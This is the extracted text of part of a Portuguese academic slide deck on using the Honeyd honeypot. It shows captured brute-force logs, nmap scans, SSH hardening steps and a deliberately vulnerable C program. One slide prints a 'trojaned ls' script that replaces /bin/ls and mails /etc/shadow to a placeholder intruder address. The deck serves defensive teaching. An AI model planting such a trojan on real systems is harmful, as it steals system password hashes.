  43. 43. Prevenir ataques do Morfeus Scanner Uma maneira de bloquear este tipo de ataques vindos do MFS ´ e adicionar as seguintes linhas de c´digo no ficheiro “.htaccess” na o pasta do website. # Start of . htaccess change . RewriteEngine On RewriteCond %{ HTTP_USER_AGENT } ^ Morfeus RewriteRule ^.* $ - [ F ] # End of . htaccess change . Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  44. 44. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  45. 45. Tentativa de brute force no servidor POP3 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  46. 46. Tentativa de brute force no servidor POP3 ... -- MARK - - ,quot; Mon Dec 22 11:34:48 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54678 ,110 , quot; USER root PASS root quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:49 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54729 ,110 , quot; USER root PASS root1 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:50 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54731 ,110 , quot; USER staff PASS staff quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:52 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER root PASS 12345 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:53 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER www PASS www quot;, -- ENDMARK - - ... Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  47. 47. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  48. 48. SSH Aqui est´ um gr´fico que mostra as tentativas de usernames: a a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  49. 49. SSH E o seguinte gr´fico mostra as tentativas de passwords: a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  50. 50. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  51. 51. A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  52. 52. Port scanning Descobrir m´quinas e respectivos portos a Cria¸˜o de pacotes personalizados ca Dificil de dominar NMap - insecure.org Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  53. 53. Port scanning Open ou Accepted: A m´quina enviou uma resposta a indicar a que um servi¸o est´ a escutar aquele porto; c a Closed, Denied ou Not Listening : A m´quina enviou uma a resposta a indicar que qualquer conex˜o no porto ser´ negada; a a Filtered, Dropped ou Blocked: N˜o houve resposta por parte a da m´quina. a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  54. 54. Port scanning Tipos de t´cnicas e TCP/SYN TCP Connect UDP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  55. 55. TCP Connect Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  56. 56. Port scanning Optimiza¸˜o ca golden@golden - laptop :~ $ sudo nmap - sS - sV 192.168.100.0/24 ... Nmap finished : 256 IP addresses (29 hosts up ) scanned in 2033.375 seconds golden@golden - laptop :~ $ sudo nmap - sS - sV - P0 192.168.100.0/24 ... Nmap finished : 256 IP addresses (32 hosts up ) scanned in 2038.191 seconds Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  57. 57. Ataque For¸a bruta / Dicion´rios c a Explora¸˜o de vulnerabilidades ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  58. 58. SSH Porto 22 Atacado em For¸a bruta / Dicion´rios c a cat /var/log/auth.log Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  59. 59. SSH - log Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from 89.235.152.18 Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:24:48 golden - laptop sshd [23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2 Dec 24 01:24:49 golden - laptop sshd [23908]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:01 golden - laptop sshd [23963]: Invalid user test from 89.235.152.18 Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:04 golden - laptop sshd [23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2 Dec 24 01:26:05 golden - laptop sshd [23965]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:21 golden - laptop sshd [23975]: Invalid user cvsuser from 89.235.152.18 Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:22 golden - laptop sshd [23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2 Dec 24 01:26:24 golden - laptop sshd [23977]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  60. 60. SSH Defesa: IPTables passwords mais fortes Autentica¸˜o RSA ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  61. 61. SSH password m´ ınimo de 8 caracteres password nao triviais combina¸˜es alfanum´ricas co e mnem´nica: “Um Whiskey-Cola vale 3 euros no BA!” = o “UW-Cv3enBA!” Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  62. 62. SSH http://www.passwordmeter.com/ Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  63. 63. SSH - Autentica¸˜o RSA ca Geramos o par de chaves com o comando “ssh-keygen -t rsa”. 1 De seguida s˜o criados os ficheiros /.ssh/id rsa (chave a privada) e /.ssh/id rsa.pub (chave p´blica) u Em cada m´quina onde nos quisermos ligar (destino), a 2 colocamos a “id rsa.pub” gerada em /.ssh/authorized keys concatenando o conte´do desta forma por exemplo: “cat u id rsa.pub >> /.ssh/authorized keys” Em cada m´quina de onde nos quisermos ligar (origem), a 3 colocamos a “id rsa” em /.ssh/ S´ falta desactivar o login baseado em password ao adicionar o 4 a linha “PasswordAuthentication no” em /etc/ssh/sshd config e de seguida fazer restart ao daemon “sshd” atrav´s de e “/etc/init.d/sshd restart”. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  64. 64. Vulnerabilidades Comportamento n˜o previsto num artefacto de software a Buffer Overflow Input n˜o validado a SQL Injection Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  65. 65. Explora¸˜o de vulnerabilidades ca Exploit ´ E a designa¸˜o dada a um peda¸o de c´digo que serve para ca c o explorar falhas em aplica¸˜es de forma a causarem um co comportamento pr´viamente n˜o antecipado nas mesmas. e a # include < stdio .h > # include < string .h > int main ( int argc , char * argv []) { char buffer [10]; strcpy ( buffer , argv [1]) ; printf ( buffer ) ; return 0; } Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  66. 66. Buffer Overflow user@honeypot :~ $ gcc exploit . c -o exploit user@honeypot :~ $ ./ exploit thisisanexploit *** stack smashing detected ***: ./ exploit terminated thisisanexploitAborted Um dos mecanismos de defesa do gcc Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  67. 67. ShellCode Um conjunto de instru¸˜es (em c´digo m´quina ou n˜o) co o a a desenvolvidas de maneira a que possam ser injectadas numa aplica¸˜o em tempo de execu¸˜o. ca ca Acesso ilegal a espa¸o de mem´ria n˜o autorizado c o a Injec¸˜o do shellcode ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  68. 68. RootKits Conjunto de programas malicionsos (trojans, backdoors chkrootkit e rkhunter (Linux)1 ; RootkitRevealer (Windows). 1 Ambos dispon´ ıveis no gestor de pacotes do Ubuntu. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  69. 69. Trojaned ls #!/ bin / bash mv / bin / ls / bin / ls . old / bin / echo quot; cat / etc / shadow | mail intruso@intruso . pt quot; > / bin / ls / bin / echo quot;/ bin / ls . old quot; >> / bin / ls chmod + x / bin / ls Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  70. 70. Conclus˜o a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

×